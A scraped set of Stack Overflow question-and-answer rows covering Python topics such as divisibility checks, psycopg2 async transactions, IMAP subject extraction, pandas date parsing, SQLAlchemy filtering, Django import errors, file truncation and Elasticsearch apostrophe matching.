| 31 | 2016-08-03T11:56:13Z | 38,813,932 | <p>I don't know if answering your own question is good or not.</p>
<p>Since I need to check whether a number is divisible by all the numbers from 1 to 20, checking each one takes a long time. But if I could make the checklist shorter it would be more efficient.</p>
<p>Like, if a number is divisible by <code>18</code> then it is also divisible by <code>2</code>, <code>3</code>, <code>6</code> and <code>9</code>. So based on this I made my checklist:</p>
<pre><code>if all(n % i == 0 for i in [7,11,13,16,17,18,19,20]):
# some code
</code></pre>
<p>And for <code>14</code>, <code>15</code> and <code>12</code>, think like that:</p>
<p><code>14</code> : If a number is divisible by both <code>2</code> and <code>7</code> it must be divisible by <code>14</code>. </p>
<p><code>15</code>: If a number is divisible by <code>20</code> it is also divisible by <code>5</code>, and if it is divisible by <code>18</code> it is also divisible by <code>3</code>; a number divisible by both <code>3</code> and <code>5</code> must be divisible by <code>15</code>. </p>
<p>This is more efficient than checking all the numbers, and it also ensures that the number is divisible by every number between 1 and 20.</p>
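<p>The reduced checklist can be sanity-checked against the full range by brute force over a sample of values (including the LCM of 1..20 and some near-misses, so both the accepting and rejecting cases are exercised):</p>

```python
# Sanity check: the short checklist and the full 2..20 range accept
# exactly the same numbers on these samples.
checklist = [7, 11, 13, 16, 17, 18, 19, 20]
lcm_1_20 = 232792560
samples = list(range(1, 5000)) + [lcm_1_20, 2 * lcm_1_20, lcm_1_20 + 1]
for n in samples:
    assert all(n % i == 0 for i in checklist) == \
           all(n % i == 0 for i in range(2, 21))
print("checklist matches the full range on all samples")
```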
| 0 | 2016-08-07T12:01:42Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
Python async transactions psycopg2 | 38,742,954 | <p>It is possible to do async i/o with psycopg2 (which can be <a href="http://initd.org/psycopg/docs/advanced.html#async-support" rel="nofollow">read here</a>) however I'm not sure how to do async transactions. Consider this sequence of things:</p>
<ul>
<li>Green Thread 1 starts transaction T</li>
<li>GT1 issues update</li>
<li>GT2 issues one transactional update</li>
<li>GT1 issues update</li>
<li>GT1 commits transaction T</li>
</ul>
<p>I assume that GT1 updates conflict with GT2 updates.</p>
<p>Now according to <a href="http://initd.org/psycopg/docs/cursor.html?highlight=cursor#cursor" rel="nofollow">docs</a>:</p>
<blockquote>
<p>Cursors created from the same connection are not isolated, i.e., any
changes done to the database by a cursor are immediately visible by
the other cursors.</p>
</blockquote>
<p>so we can't implement the flow above on cursors. We could implement it on different connections but since we are doing async then spawning (potentially) thousands db connections might be bad (not to mention that Postgres can't handle so much out-of-the-box).</p>
<p>The other option is to have a pool of connections and reuse them. But then if we issue X parallel transactions all other green threads are blocked until some connection is available. Thus the actual amount of useful green threads is ~X (assuming the app is heavily db bound) which raises question: why would we use async to begin with?</p>
<p>Now this question can actually be generalized to DB API 2.0. Maybe the real answer is that DB API 2.0 is not suited for async programming? How would we do async io on Postgresql then? Maybe some other library?</p>
<p>Or maybe is that because the postgresql protocol is actually synchronous? It would be perfect to be able to "write" to any transaction at any time (per connection). Postgresql would have to expose transaction's id for that. Is it doable? Maybe two-phase commit is the answer?</p>
<p>Or am I missing something here?</p>
<p><strong>EDIT:</strong> This seems to be a general problem with SQL since <code>BEGIN; COMMIT;</code> semantics just can't be used asynchronously efficiently.</p>
| 2 | 2016-08-03T11:56:49Z | 38,744,541 | <p>Actually you can use BEGIN; and COMMIT; with async. What you need is a connection pool set up so that each green thread gets its own connection (just like a real thread would in a multithreaded application).</p>
<p>You cannot use psycopg2's builtin transaction handling.</p>
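<p>The acquire/release discipline each green thread must follow looks roughly like this. Note this is a minimal sketch using a plain stdlib queue and a placeholder connection class instead of real psycopg2 connections (<code>FakeConnection</code>, <code>Pool</code> and the method names <code>getconn</code>/<code>putconn</code> are illustrative; <code>psycopg2.pool</code> provides real pool classes). Python 3 shown (<code>queue</code> is <code>Queue</code> on Python 2):</p>

```python
# Minimal connection-pool sketch: a worker checks a connection out, runs
# its whole BEGIN..COMMIT sequence on that one connection, then returns it.
import queue

class FakeConnection(object):
    """Stand-in for a real psycopg2 connection; records executed SQL."""
    def __init__(self, n):
        self.n = n
        self.log = []
    def execute(self, sql):
        self.log.append(sql)

class Pool(object):
    def __init__(self, size):
        self._q = queue.Queue()
        for i in range(size):
            self._q.put(FakeConnection(i))
    def getconn(self):
        return self._q.get()       # blocks when all connections are in use
    def putconn(self, conn):
        self._q.put(conn)

pool = Pool(2)
conn = pool.getconn()
conn.execute("BEGIN")
conn.execute("UPDATE t SET x = 1")
conn.execute("COMMIT")
pool.putconn(conn)                 # only release after the transaction ends
print(conn.log)
```
<p>The key point is that the transaction is never interleaved with another green thread's statements, because the connection is exclusively held from <code>getconn</code> to <code>putconn</code>.</p>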
| 0 | 2016-08-03T13:05:06Z | [
"python",
"postgresql",
"asynchronous",
"psycopg2",
"python-db-api"
] |
python imap4 extract subject mails | 38,743,027 | <p>I have this Python code:</p>
<pre><code>import imaplib
import email, sys
imaplib._MAXLINE = 40000
mail = imaplib.IMAP4('imapmail.libero.it')
mail.login('username@libero.it', 'password')
mail.list()
mail.select('inbox')
result, data = mail.search(None, 'All')
out = open('output.txt', 'a', 0)
for latest_email_uid in data[0].split():
try:
result, data = mail.uid('fetch', latest_email_uid, '(RFC822)')
raw_email = data[0][1]
email_message = email.message_from_string(raw_email)
tmp = email_message['Subject']
tmp = tmp.strip().replace('\r','').replace('\n','')+'\n'
sys.stdout.write("\r"+tmp)
out.write(tmp.strip() + '\n')
except Exception as e:
print e
mail.close()
out.close()
</code></pre>
<p>The code returns these errors:</p>
<pre><code>'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
"Samsung MZ-7KE1T0BW SSD 850 PRO..."
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
Promozione finestre termiche in pvc Gruppo Re
Il Giubileo di Papa Francesco
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
'NoneType' object has no attribute '__getitem__'
</code></pre>
<p>I need to extract all subjects from the inbox and write them to a text file. With another email service my code works without problems. How can I resolve this? Where is the problem?</p>
| 1 | 2016-08-03T12:00:01Z | 38,744,582 | <p>When you do...</p>
<pre><code>result, data = mail.search(None, 'All')
</code></pre>
<p>...<code>data</code> holds <code>message sequence numbers</code>, not <code>uids</code>. Message sequence numbers and UIDs are not the same. </p>
<p>So, to fix your code, replace the above line with:</p>
<pre><code>result, data = mail.uid('search', None, 'All')
</code></pre>
<blockquote>
<p>An UID is a unique identifier that will not change over time while a
message sequence number may change whenever the content of the mailbox
changes.</p>
</blockquote>
<p>You can read more about the attributes <a href="https://tools.ietf.org/html/rfc3501#section-2.3.1.1" rel="nofollow">UID</a> and <a href="https://tools.ietf.org/html/rfc3501#section-2.3.1.2" rel="nofollow">Message Sequence Numbers</a> here: <a href="https://tools.ietf.org/html/rfc3501" rel="nofollow">https://tools.ietf.org/html/rfc3501</a></p>
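<p>On top of that fix, the Subject-cleaning step can be made robust, since some messages legitimately have no Subject header (which would leave <code>tmp</code> as <code>None</code> and crash the <code>strip()</code> call). A minimal, server-free sketch; the sample messages below are made up:</p>

```python
import email

def clean_subject(raw_email):
    """Return a stripped, single-line Subject, or None if the header is absent."""
    message = email.message_from_string(raw_email)
    subject = message['Subject']  # None when the header is missing
    if subject is None:
        return None
    return subject.strip().replace('\r', '').replace('\n', '')

with_subject = "Subject: Promo offer\r\nFrom: a@example.com\r\n\r\nbody\r\n"
without_subject = "From: a@example.com\r\n\r\nbody\r\n"
print(clean_subject(with_subject))     # Promo offer
print(clean_subject(without_subject))  # None
```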
| 0 | 2016-08-03T13:07:40Z | [
"python"
] |
Pandas Converter on Data strptime() | 38,743,079 | <p>I am trying to plot these points, but I am getting the error below. Do I need another converter for the date data? The x-axis should be the date, and the y-axis should be the time value. Thank you.</p>
<p>TypeError: strptime() argument 1 must be str, not Timestamp</p>
<pre><code>df = pd.read_csv('file.csv', sep=',', parse_dates=[0], header=None,
names=['Date', 'Time'])
print (df.head())
Date Time
0 2015-01-02 02:29:45 PM
1 2015-01-02 05:16:15 PM
2 2015-01-02 05:48:46 PM
3 2015-01-02 03:18:34 PM
4 2015-01-02 05:22:55 PM
In [5]:
date = df['Date']
time = df['Time']
from matplotlib import pyplot as plt
from matplotlib.dates import date2num
def date_to_days(date):
return date2num(datetime.datetime.strptime(date,'%Y-%m-%d'))
def time_to_hours(time):
[hh, mm, ss] = [int(x) for x in time.split(':')]
seconds = datetime.timedelta(hours=hh, minutes=mm, seconds=ss).seconds
hours = seconds / float(3600)
return hours
if __name__ == '__main__':
start_date = '2015-01-01'
end_date = '2015-01-31'
dates = date
times = time
days = [date_to_days(d) for d in dates]
hours = [time_to_hours(t) for t in times]
plt.plot_date(days, hours, ydate=False)
plt.axis([date_to_days(start_date), date_to_days(end_date), 0, 24])
plt.xlabel('Date')
plt.ylabel('Time (hours)')
plt.show()
</code></pre>
| 1 | 2016-08-03T12:02:00Z | 38,743,431 | <p>The problem seems to be that you assume <code>df['Date']</code> is a string column and you're trying to convert it to date with <code>[date_to_days(d) for d in dates]</code>, but since you read the file with the <code>parse_dates=[0]</code> option, pandas already parsed it.</p>
| 0 | 2016-08-03T12:17:06Z | [
"python"
] |
Pandas Converter on Data strptime() | 38,743,079 | <p>I am trying to plot these points, but I am getting the error below. Do I need another converter for the date data? The x-axis should be the date, and the y-axis should be the time value. Thank you.</p>
<p>TypeError: strptime() argument 1 must be str, not Timestamp</p>
<pre><code>df = pd.read_csv('file.csv', sep=',', parse_dates=[0], header=None,
names=['Date', 'Time'])
print (df.head())
Date Time
0 2015-01-02 02:29:45 PM
1 2015-01-02 05:16:15 PM
2 2015-01-02 05:48:46 PM
3 2015-01-02 03:18:34 PM
4 2015-01-02 05:22:55 PM
In [5]:
date = df['Date']
time = df['Time']
from matplotlib import pyplot as plt
from matplotlib.dates import date2num
def date_to_days(date):
return date2num(datetime.datetime.strptime(date,'%Y-%m-%d'))
def time_to_hours(time):
[hh, mm, ss] = [int(x) for x in time.split(':')]
seconds = datetime.timedelta(hours=hh, minutes=mm, seconds=ss).seconds
hours = seconds / float(3600)
return hours
if __name__ == '__main__':
start_date = '2015-01-01'
end_date = '2015-01-31'
dates = date
times = time
days = [date_to_days(d) for d in dates]
hours = [time_to_hours(t) for t in times]
plt.plot_date(days, hours, ydate=False)
plt.axis([date_to_days(start_date), date_to_days(end_date), 0, 24])
plt.xlabel('Date')
plt.ylabel('Time (hours)')
plt.show()
</code></pre>
| 1 | 2016-08-03T12:02:00Z | 38,743,457 | <p><code>datetime.strptime()</code> is for <em>parsing</em> strings into <code>datetime.datetime</code> objects. As such it makes no sense to apply it to a <code>pandas.tslib.Timestamp</code> object, which is what would be passed in by <code>[date_to_days(d) for d in dates]</code> because <code>dates</code> contains those objects.</p>
<p>It should be possible to pass the pandas timestamp directly to <code>date2num()</code>:</p>
<pre><code>def date_to_days(date):
return date2num(date)
>>> days = [date_to_days(d) for d in dates]
>>> days
[735600.0, 735600.0, 735600.0, 735600.0, 735600.0]
</code></pre>
<p>Later in your code you want to call <code>date2num()</code> on date strings, however, you could simply define them upfront as <code>datetime</code> objects so as to avoid parsing the strings:</p>
<pre><code>start_date = datetime.datetime(2015, 1, 1)
end_date = datetime.datetime(2015, 1, 31)
</code></pre>
<p>and this will work with the revised function that I show above; in fact the <code>date_to_days()</code> function is no longer required.... just call <code>date2num()</code> directly:</p>
<pre><code>days = [date2num(d) for d in dates]
</code></pre>
<p>and</p>
<pre><code>plt.axis([date2num(start_date), date2num(end_date), 0, 24])
</code></pre>
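<p>A quick way to see why the Timestamp can be passed straight through (a small sketch, independent of the question's data): a pandas <code>Timestamp</code> is itself a <code>datetime</code>, so no string parsing is needed before handing it to date-aware APIs.</p>

```python
import datetime
import pandas as pd

ts = pd.Timestamp('2015-01-02')
# A Timestamp subclasses datetime.datetime, so it already behaves like one
print(isinstance(ts, datetime.datetime))   # True
print(ts.year, ts.month, ts.day)           # 2015 1 2
```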
| 0 | 2016-08-03T12:18:09Z | [
"python"
] |
why use sqlalchemy declarative api? | 38,743,100 | <p>New to SQLAlchemy and somewhat of a novice with programming and Python. I want to query a table. It seems I can use the all() function when querying but cannot filter without creating a class.</p>
<p>1.) Can I filter without creating a class and using the declarative api? Is the filtering example stated below incorrect?
2.) When would it be appropriate to use declarative api in sqlalchemy and when would it not be appropriate?</p>
<pre><code>import sqlalchemy as sql
from sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import sessionmaker
db = sql.create_engine('postgresql://postgres:password@localhost:5432/postgres')
engine = db.connect()
meta = MetaData(engine)
session = sessionmaker(bind=engine)
session = session()
files = Table('files',meta,
Column('file_id',Integer,primary_key=True),
Column('file_name',String(256)),
Column('query',String(256)),
Column('results',Integer),
Column('totalresults',Integer),
schema='indeed')
session.query(files).all() #ok
session.query(files).filter(files.file_name = 'test.json') #not ok
</code></pre>
| 0 | 2016-08-03T12:02:39Z | 38,743,594 | <p>Filter this way (note the <code>.c</code> accessor, which is needed because <code>files</code> here is a plain <code>Table</code>, not a declarative class):</p>
<pre><code>session.query(files).filter(files.c.file_name == 'test.json').all()
</code></pre>
<p>You can also use raw sql queries (<a href="http://docs.sqlalchemy.org/en/latest/core/connections.html#basic-usage" rel="nofollow">docs</a>).</p>
<p>Whether to use the declarative API may depend on your queries' complexity, because sometimes SQLAlchemy doesn't optimize them the right way.</p>
| 1 | 2016-08-03T12:24:42Z | [
"python",
"postgresql",
"sqlalchemy"
] |
why use sqlalchemy declarative api? | 38,743,100 | <p>New to SQLAlchemy and somewhat of a novice with programming and Python. I want to query a table. It seems I can use the all() function when querying but cannot filter without creating a class.</p>
<p>1.) Can I filter without creating a class and using the declarative api? Is the filtering example stated below incorrect?
2.) When would it be appropriate to use declarative api in sqlalchemy and when would it not be appropriate?</p>
<pre><code>import sqlalchemy as sql
from sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import sessionmaker
db = sql.create_engine('postgresql://postgres:password@localhost:5432/postgres')
engine = db.connect()
meta = MetaData(engine)
session = sessionmaker(bind=engine)
session = session()
files = Table('files',meta,
Column('file_id',Integer,primary_key=True),
Column('file_name',String(256)),
Column('query',String(256)),
Column('results',Integer),
Column('totalresults',Integer),
schema='indeed')
session.query(files).all() #ok
session.query(files).filter(files.file_name = 'test.json') #not ok
</code></pre>
| 0 | 2016-08-03T12:02:39Z | 38,750,610 | <p>If you want to filter by a <code>Table</code> construct, it should be:</p>
<pre><code>session.query(files).filter(files.c.file_name == 'test.json')
</code></pre>
<p>You need to create mapped classes if you want to use the ORM features of SQLAlchemy. For example, with the code you currently have, in order to do an update you have to do</p>
<pre><code>session.execute(files.update().values(...))
</code></pre>
<p>As opposed to:</p>
<pre><code>file = session.query(File).first()
file.file_name = "new file name"
session.commit()
</code></pre>
<p>The declarative API happens to be the easiest way of constructing mapped classes, so use it if you want to use the ORM.</p>
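<p>To make the contrast concrete, here is a minimal declarative mapping of the question's <code>files</code> table (a sketch only: the column set is trimmed, and an in-memory SQLite database stands in for PostgreSQL):</p>

```python
from sqlalchemy import Column, Integer, String, create_engine
from sqlalchemy.orm import sessionmaker
try:  # SQLAlchemy 1.4+ location
    from sqlalchemy.orm import declarative_base
except ImportError:  # older releases
    from sqlalchemy.ext.declarative import declarative_base

Base = declarative_base()

class File(Base):
    __tablename__ = 'files'
    file_id = Column(Integer, primary_key=True)
    file_name = Column(String(256))

engine = create_engine('sqlite://')      # in-memory DB just for illustration
Base.metadata.create_all(engine)
session = sessionmaker(bind=engine)()

session.add(File(file_name='test.json'))
session.commit()

found = session.query(File).filter(File.file_name == 'test.json').first()
print(found.file_name)                   # test.json
```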
| 1 | 2016-08-03T17:56:27Z | [
"python",
"postgresql",
"sqlalchemy"
] |
My code with truncate() appends new data instead of replacing old data | 38,743,152 | <p>This code below is supposed to delete the content of the file and write the new strings that the user enters through the terminal, but in reality it only appends a new line to what is already there. I can't seem to make it fully erase the content with <code>truncate()</code>. How do I do this?</p>
<p><strong>Note</strong>: it has to be done with <code>truncate()</code> as it's an exercise from the book and I don't want to jump into the future and use any more advanced stuff.
Thanks!</p>
<pre><code>from sys import argv
script, filename, user_name = argv
print("Hi my dear %s... I hope you're doing great today\n" % user_name)
print("We're going to write a string to a file %r\n" % filename)
open_file = open(filename, 'r+')
print("%s, this is what currently file %r has" % (user_name, filename))
read_file = open_file.read()
print("File's content is:\n", read_file)
quote = "To create, first sometime you need to destroy"
print("\n\nAs a quote from your favourite movie says: \n\n %r" \
% quote)
print("So, we will delete the content from the file %r" \
% filename)
open_file.truncate()
print("This is the file %r now" % filename)
print(read_file)
new_line = input("Now let's write something, please start here... ")
print("now %s, let's add this line to the same file %r" \
% (user_name, filename))
open_file.write(new_line)
print("Closing the file")
open_file.close()
print(read_file)
open_file.close()
</code></pre>
| 0 | 2016-08-03T12:04:38Z | 38,743,210 | <p><a href="https://docs.python.org/3/library/io.html#io.IOBase.truncate" rel="nofollow"><code>truncate()</code></a> without any arguments truncates at the current position. Pass a size to make it truncate the file to that size.</p>
| 2 | 2016-08-03T12:07:04Z | [
"python",
"python-3.x"
] |
My code with truncate() appends new data instead of replacing old data | 38,743,152 | <p>This code below is supposed to delete the content of the file and write the new strings that the user enters through the terminal, but in reality it only appends a new line to what is already there. I can't seem to make it fully erase the content with <code>truncate()</code>. How do I do this?</p>
<p><strong>Note</strong>: it has to be done with <code>truncate()</code> as it's an exercise from the book and I don't want to jump into the future and use any more advanced stuff.
Thanks!</p>
<pre><code>from sys import argv
script, filename, user_name = argv
print("Hi my dear %s... I hope you're doing great today\n" % user_name)
print("We're going to write a string to a file %r\n" % filename)
open_file = open(filename, 'r+')
print("%s, this is what currently file %r has" % (user_name, filename))
read_file = open_file.read()
print("File's content is:\n", read_file)
quote = "To create, first sometime you need to destroy"
print("\n\nAs a quote from your favourite movie says: \n\n %r" \
% quote)
print("So, we will delete the content from the file %r" \
% filename)
open_file.truncate()
print("This is the file %r now" % filename)
print(read_file)
new_line = input("Now let's write something, please start here... ")
print("now %s, let's add this line to the same file %r" \
% (user_name, filename))
open_file.write(new_line)
print("Closing the file")
open_file.close()
print(read_file)
open_file.close()
</code></pre>
| 0 | 2016-08-03T12:04:38Z | 38,743,218 | <p>The <a href="https://docs.python.org/2/library/stdtypes.html#file.truncate" rel="nofollow"><code>truncate</code></a> method has an optional <code>size</code> argument which defaults to the current position of the file pointer. Since you've already called <code>read</code> on the file, <code>truncate</code> isn't doing anything as the current position is the end of the file. </p>
<p>Change your call to <code>truncate(0)</code> and it'll clear the file. </p>
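<p>One detail worth pairing with <code>truncate(0)</code>: after the <code>read()</code>, the file pointer still sits at the old end of file, so a plain <code>write()</code> would pad the truncated file with NUL bytes. Seek back to the start first. A self-contained sketch (temporary file and sample strings are made up):</p>

```python
import os
import tempfile

fd, path = tempfile.mkstemp()
os.close(fd)

with open(path, 'w') as f:
    f.write('old content that should disappear')

with open(path, 'r+') as f:
    f.read()          # the file pointer is now at the end of the file
    f.truncate(0)     # the file is now empty, but the pointer has not moved
    f.seek(0)         # rewind; otherwise write() pads the gap with NUL bytes
    f.write('new line')

with open(path) as f:
    content = f.read()

os.remove(path)
print(content)        # new line
```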
| 1 | 2016-08-03T12:07:22Z | [
"python",
"python-3.x"
] |
django.core.validators is not a package | 38,743,262 | <p>I've been struggling with this issue for a couple of days and still can't figure out why this is happening.
I'm trying to at least access a shell via manage.py or perform a migration.
(django 1.9.8, python 3.5.2)</p>
<pre><code> Traceback (most recent call last):
File "gris/gris/manage.py", line 14, in <module>
execute_from_command_line(sys.argv)
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 353, in execute_from_command_line
utility.execute()
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 345, in execute
self.fetch_command(subcommand).run_from_argv(self.argv)
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 195, in fetch_command
klass = load_command_class(app_name, subcommand)
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 39, in load_command_class
module = import_module('%s.management.commands.%s' % (app_name, name))
File "/home/user/Python-3.5.2/Lib/importlib/__init__.py", line 126, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
File "<frozen importlib._bootstrap>", line 986, in _gcd_import
File "<frozen importlib._bootstrap>", line 969, in _find_and_load
File "<frozen importlib._bootstrap>", line 944, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 222, in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 986, in _gcd_import
File "<frozen importlib._bootstrap>", line 969, in _find_and_load
File "<frozen importlib._bootstrap>", line 944, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 222, in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 986, in _gcd_import
File "<frozen importlib._bootstrap>", line 969, in _find_and_load
File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ImportError: No module named 'django.core.validators.management'; 'django.core.validators' is not a package
</code></pre>
<p>I'm trying to run the script from inside the virtual environment. The weird part is: everything works on MacOS machines and PyCharm is able to run the server.</p>
<p>What have i tried so far:</p>
<ol>
<li>Made sure i'm using the correct version of python and django.</li>
<li>Took manage.py from a freshly created project and replaced it</li>
<li>Grep'ed the filesystem for 'django.core.validators'</li>
<li>Downloaded Python sources, compiled them locally and created new virtual environment</li>
<li>Tried running it without virtual environment</li>
<li>Tried different django(1.9.0, 1.9.6, 1.9.5) and python(3.4, 3.5.2) versions</li>
</ol>
<p>I have run out of ideas about what could cause this. django.core.validators is not a package, it's a .py file, and apparently there's no code trying to access it differently.</p>
<p>Any ideas/suggestions?</p>
<p>My project structure: <a href="http://i.stack.imgur.com/W7YV1.png" rel="nofollow"><img src="http://i.stack.imgur.com/W7YV1.png" alt="my_project_structure"></a></p>
| 0 | 2016-08-03T12:09:16Z | 38,743,444 | <p>According to the <a href="https://docs.djangoproject.com/en/1.9/ref/validators/" rel="nofollow">Django documentation</a> and indeed the <a href="https://docs.djangoproject.com/en/1.9/_modules/django/core/validators/" rel="nofollow">source code</a> <code>django.core.validators</code> is a module, and does not contain a <code>management</code> attribute.</p>
| 0 | 2016-08-03T12:17:34Z | [
"python",
"django",
"debian",
"importerror"
] |
django.core.validators is not a package | 38,743,262 | <p>I've been struggling with this issue for a couple of days and still can't figure out why this is happening.
I'm trying to at least access a shell via manage.py or perform a migration.
(django 1.9.8, python 3.5.2)</p>
<pre><code> Traceback (most recent call last):
File "gris/gris/manage.py", line 14, in <module>
execute_from_command_line(sys.argv)
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 353, in execute_from_command_line
utility.execute()
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 345, in execute
self.fetch_command(subcommand).run_from_argv(self.argv)
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 195, in fetch_command
klass = load_command_class(app_name, subcommand)
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 39, in load_command_class
module = import_module('%s.management.commands.%s' % (app_name, name))
File "/home/user/Python-3.5.2/Lib/importlib/__init__.py", line 126, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
File "<frozen importlib._bootstrap>", line 986, in _gcd_import
File "<frozen importlib._bootstrap>", line 969, in _find_and_load
File "<frozen importlib._bootstrap>", line 944, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 222, in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 986, in _gcd_import
File "<frozen importlib._bootstrap>", line 969, in _find_and_load
File "<frozen importlib._bootstrap>", line 944, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 222, in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 986, in _gcd_import
File "<frozen importlib._bootstrap>", line 969, in _find_and_load
File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ImportError: No module named 'django.core.validators.management'; 'django.core.validators' is not a package
</code></pre>
<p>I'm trying to run the script from inside the virtual environment. The weird part is: everything works on MacOS machines and PyCharm is able to run the server.</p>
<p>What have i tried so far:</p>
<ol>
<li>Made sure i'm using the correct version of python and django.</li>
<li>Took manage.py from a freshly created project and replaced it</li>
<li>Grep'ed the filesystem for 'django.core.validators'</li>
<li>Downloaded Python sources, compiled them locally and created new virtual environment</li>
<li>Tried running it without virtual environment</li>
<li>Tried different django(1.9.0, 1.9.6, 1.9.5) and python(3.4, 3.5.2) versions</li>
</ol>
<p>I have run out of ideas about what could cause this. django.core.validators is not a package, it's a .py file, and apparently there's no code trying to access it differently.</p>
<p>Any ideas/suggestions?</p>
<p>My project structure: <a href="http://i.stack.imgur.com/W7YV1.png" rel="nofollow"><img src="http://i.stack.imgur.com/W7YV1.png" alt="my_project_structure"></a></p>
| 0 | 2016-08-03T12:09:16Z | 38,743,608 | <p>That error would perhaps be raised if <code>django.core.validators</code> was in your <code>INSTALLED_APPS</code> setting. </p>
<p>If it is in your <code>INSTALLED_APPS</code> setting, then it shouldn't be there because it's not an app. Remove it.</p>
| 1 | 2016-08-03T12:25:14Z | [
"python",
"django",
"debian",
"importerror"
] |
Elastic doesn't find the word with the apostrophe (') | 38,743,274 | <p>I am trying to find the sentence that contains the word with the apostrophe. So, in the text </p>
<blockquote>
<p>If you ask foreigners to name some typically English dishes, they
will probably say fish and chips and then stop. It is disappointing,
but true, that there is no tradition in Britain of eating in
restaurants, because our food doesn't lend itself to such preparation.
British cooking is found in the home, where it is possible to time the
dishes to perfection. So it is difficult to find a good English
restaurant with reasonable prices</p>
</blockquote>
<p>I try to find</p>
<blockquote>
<p>find it is disappointing, but true, that there is no tradition in
britain of eating in restaurants, because our food doesn't</p>
</blockquote>
<p>I create the query</p>
<pre><code>{
"_index": "liza_index",
"_type": ".percolator",
"_id": "1594",
"_version": 37,
"found": true,
"_source": {
"query": {
"bool": {
"minimum_should_match": 1,
"should": {
"span_or": {
"clauses": [{
"span_near": {
"in_order": true,
"clauses": [{
"span_multi": {
"match": {
"regexp": {
"message": "it"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "is"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "disappointing"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "but"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "true"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "that"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "there"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "is"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "no"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "tradition"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "in"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "britain"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "of"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "eating"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "in"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "restaurants"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "because"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "our"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "food"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "doesn't"
}
}
}
}],
"slop": 0,
"collect_payloads": false
}
}]
}
}
}
}
}}
</code></pre>
<p>But the Elastic doesn't find it. Without the "doesn't" the query works.</p>
<p>I tried to add the backslash before the apostrophe - "doesn\'t" isn't valid, so I made "doesn\\'t" and "doesn\\\\'t". But it doesn't work.</p>
<p>By the way, I create the query with the one word "doesn't" with the backslashes and without</p>
<pre><code>{
"_index": "liza_index",
"_type": ".percolator",
"_id": "2101",
"_version": 31,
"found": true,
"_source": {
"query": {
"bool": {
"minimum_should_match": 1,
"should": {
"span_or": {
"clauses": [{
"span_multi": {
"match": {
"regexp": {
"message": "doesn't"
}
}
}
}]
}
}
}
}
}}
</code></pre>
<p>And it doesn't work too. At the same time the following queries work</p>
<pre><code>curl -XPUT 'localhost:9200/liza_index/.percolator/1' -d '{"query" : {"match" : {"message" : "doesn't"}}}'
</code></pre>
<p>and</p>
<pre><code>curl -XPUT 'localhost:9200/liza_index/.percolator/1' -d '{"query" : {"match" : {"message" : "doesn\\'t"}}}'
</code></pre>
<p>The question is: how can I find the word with the apostrophe? What kind of query should I create using the structure of my first query?</p>
| 1 | 2016-08-03T12:09:44Z | 38,745,845 | <blockquote>
<p>âThe hardest thing of all is to find a black cat in a dark room,
especially if there is no cat.â</p>
<p>â Confucius</p>
</blockquote>
<p>Elasticsearch performs <a href="https://www.elastic.co/guide/en/elasticsearch/guide/current/analysis-intro.html#_built_in_analyzers" rel="nofollow">standard analysis and curation</a> of the data it receives, which removes most punctuation. If you use a <strong>match</strong> query, your query text passes through the same analysis, so it will work (all punctuation is removed from the query as well). Regexp queries are not analyzed, which is why they cannot find the apostrophe.</p>
<p>Instead of generating complex regexp queries you could use <strong><a href="https://www.elastic.co/guide/en/elasticsearch/guide/current/phrase-matching.html" rel="nofollow">match_phrase</a></strong></p>
<pre><code>curl -XPOST "http://esarchive.local:9200/liza_index/.percolator/_search" -d'
{
"query": {
"match_phrase": {
"message": "find it is disappointing, but true, that there is no tradition in britain of eating in restaurants, because our food doesn\"t"
}
}
}'
</code></pre>
<p>or create a custom analyzer/mapping to preserve punctuation.</p>
